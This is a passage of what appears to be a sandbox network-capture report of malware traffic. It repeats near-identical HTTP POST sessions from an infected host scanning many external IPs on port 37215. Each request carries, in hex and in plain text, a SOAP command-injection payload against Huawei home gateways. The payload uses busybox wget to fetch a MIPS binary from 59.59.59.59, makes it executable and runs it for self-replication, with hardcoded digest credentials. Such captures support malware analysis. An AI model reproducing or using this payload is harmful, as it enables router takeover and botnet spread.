                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          584192.168.2.1546094157.77.127.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597295046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          585192.168.2.1550502157.41.43.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597372055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          586192.168.2.1553328157.70.201.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.597390890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          587192.168.2.1551894109.70.126.20837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.622946978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          588192.168.2.1548316197.110.136.25037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.622972012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          589192.168.2.1556948157.189.163.16037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.623290062 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          590192.168.2.153352841.240.113.19537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.623305082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          591192.168.2.1546460197.104.91.1037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.623369932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          592192.168.2.153928041.39.90.8637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.623390913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          593192.168.2.1556284157.120.103.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.623406887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
